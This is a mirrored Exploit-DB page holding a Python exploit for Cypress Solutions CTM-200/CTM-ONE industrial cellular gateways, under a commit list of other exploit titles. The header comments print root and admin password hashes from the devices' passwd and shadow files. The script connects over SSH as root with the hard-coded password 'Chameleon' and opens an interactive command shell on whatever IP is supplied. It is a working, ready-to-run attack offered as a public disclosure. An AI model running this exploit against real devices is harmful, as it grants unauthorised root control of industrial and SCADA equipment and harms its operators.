bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/hardware/remote/50407.py
Offensive Security 679a62755b DB: 2021-10-14 
28 changes to exploits/shellcodes

Cypress Solutions CTM-200/CTM-ONE - Hard-coded Credentials Remote Root (Telnet/SSH)
Cypress Solutions CTM-200 2.7.1 - Root Remote OS Command Injection

Ahsay Backup 7.x - 8.1.1.50 - Authenticated Arbitrary File Upload / Remote Code Execution
Ahsay Backup 8.1.1.50 - Insecure File Upload and Code Execution (Authenticated)

Simple Payroll System 1.0 - SQLi Authentication Bypass

Dolibarr ERP/CRM 14.0.1 - Privilege Escalation

Patient Appointment Scheduler System 1.0 - Unauthenticated File Upload & Remote Code Execution (RCE)

Budget and Expense Tracker System 1.0 - Remote Code Execution (RCE) (Unauthenticated)

Budget and Expense Tracker System 1.0 - Arbitrary File Upload
FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Hidden Backdoor Account (Write Access)
FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Remote Privilege Escalation
Company's Recruitment Management System 1.0 - 'Multiple' SQL Injection (Unauthenticated)
Keycloak 12.0.1 - 'request_uri ' Blind Server-Side Request Forgery (SSRF) (Unauthenticated)
Apache HTTP Server 2.4.50 - Path Traversal & Remote Code Execution (RCE)
Pharmacy Point of Sale System 1.0 - 'Add New User' Cross-Site Request Forgery (CSRF)
Online Learning System 2.0 - 'Multiple' SQLi Authentication Bypass
Simple Issue Tracker System 1.0 - SQLi Authentication Bypass
Student Quarterly Grading System 1.0 - 'grade' Stored Cross-Site Scripting (XSS)
Logitech Media Server 8.2.0 - 'Title' Cross-Site Scripting (XSS)
Sonicwall SonicOS 7.0 - Host Header Injection

Windows/x64 - Reverse TCP (192.168.201.11:4444) Shellcode (330 Bytes)
2021-10-14 05:02:11 +00:00

117 lines
No EOL
3.6 KiB
Python
Executable file
Raw Blame History

# Exploit Title: Cypress Solutions CTM-200/CTM-ONE - Hard-coded Credentials Remote Root (Telnet/SSH)
# Date: 21.09.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.cypress.bc.ca
#!/usr/bin/env python3
#
#
# Cypress Solutions CTM-200/CTM-ONE Hard-coded Credentials Remote Root (Telnet/SSH)
#
#
# Vendor: Cypress Solutions Inc.
# Product web page: https://www.cypress.bc.ca
# Affected version: CTM-ONE (1.3.6-latest)
# CTM-ONE (1.3.1)
# CTM-ONE (1.1.9)
# CTM200 (2.7.1.5659-latest)
# CTM200 (2.0.5.3356-184)
#
# Summary: CTM-200 is the industrial cellular wireless gateway for fixed
# and mobile applications. The CTM-200 is a Linux based platform powered
# by ARM Cortex-A8 800 MHz superscalar processor. Its on-board standard
# features make the CTM-200 ideal for mobile fleet applications or fixed
# site office and SCADA communications.
#
# CTM-ONE is the industrial LTE cellular wireless gateway for mobile and
# fixed applications. CTM-ONE is your next generation of gateway for fleet
# tracking and fixed sites.
#
# ======================================================================
# CTM-200
# /var/config/passwd:
# -------------------
# root:$1$5RS5yR6V$Lo9QCp3rB/7UCU8fRq5ec0:0:0:root:/root:/bin/ash
# admin:$1$5RS5yR6V$Lo9QCp3rB/7UCU8fRq5ec0:0:0:root:/root:/bin/ash
# nobody:*:65534:65534:nobody:/var:/bin/false
# daemon:*:65534:65534:daemon:/var:/bin/false
#
# /var/config/advanced.ini:
# -------------------------
# 0
# 0
# Chameleon
# 0,0,0,0,0,255
# 0,0,0,0,0,255
# 0,0,0,0,0,255
# 0,0,0,0,0,255
# 0,0,0,0,0,255
# 0,0,0,0,0,255
#
#
# CTM-ONE
# /etc/shadow:
# ------------
# admin:$6$l22Co5pX$.TzqtAF55KX2XkQrjENNkqQfRBRB2ai0ujayHE5Ese7SdcxkXf1EPQqDv3/d2u3D/OHlgngU8f9Pn5.gO61vx/:17689:0:99999:7:::
# root:$6$5HHLZqFi$Gw4IfW2NBiwce/kMpc2JGM1byduuiJJy/Z7YhKQjSi4JSx8cur0FYhSDmg5iTXaehqu/d6ZtxNZtECZhLJrLC/:17689:0:99999:7:::
# daemon:*:16009:0:99999:7:::
# bin:*:16009:0:99999:7:::
# sys:*:16009:0:99999:7:::
# ftp:*:16009:0:99999:7:::
# nobody:*:16009:0:99999:7:::
# messagebus:!:16009:0:99999:7:::
# ======================================================================
#
# Desc: The CTM-200 and CTM-ONE are vulnerable to hard-coded credentials
# within their Linux distribution image. This weakness can lead to the
# exposure of resources or functionality to unintended actors, providing
# attackers with sensitive information including executing arbitrary code.
#
# Tested on: GNU/Linux 4.1.15-1.2.0+g77f6154 (arm7l)
# GNU/Linux 2.6.32.25 (arm4tl)
# lighttpd/1.4.39
# BusyBox v1.24.1
# BusyBox v1.15.3
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2021-5686
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5686.php
#
#
# 21.09.2021
#
import sys
import paramiko
bnr='''
o ┌─┐┌┬┐┌─┐ ┌─┐ ┬─┐┌─┐┌─┐┌┬┐┌─┐┬ ┬┌─┐┬ ┬ o
│ │││││ ┬ ├─┤ ├┬┘│ ││ │ │ └─┐├─┤├┤ │ │
o └─┘┴ ┴└─┘ ┴ ┴ ┴└─└─┘└─┘ ┴ └─┘┴ ┴└─┘┴─┘┴─┘ o
'''
print(bnr)
if len(sys.argv)<2:
print('Put an IP.')
sys.exit()
adrs=sys.argv[1]##
unme='root'#admin#
pwrd='Chameleon'##
rsh=paramiko.SSHClient()
rsh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
rsh.connect(adrs,username=unme,password=pwrd)
while 1:
cmnd=input('# ')
if cmnd=='exit':
break
stdin,stdout,stderr=rsh.exec_command(cmnd)
stdin.close()
print(str(stdout.read().decode()))
rsh.close()
Reference in a new issue View git blame Copy permalink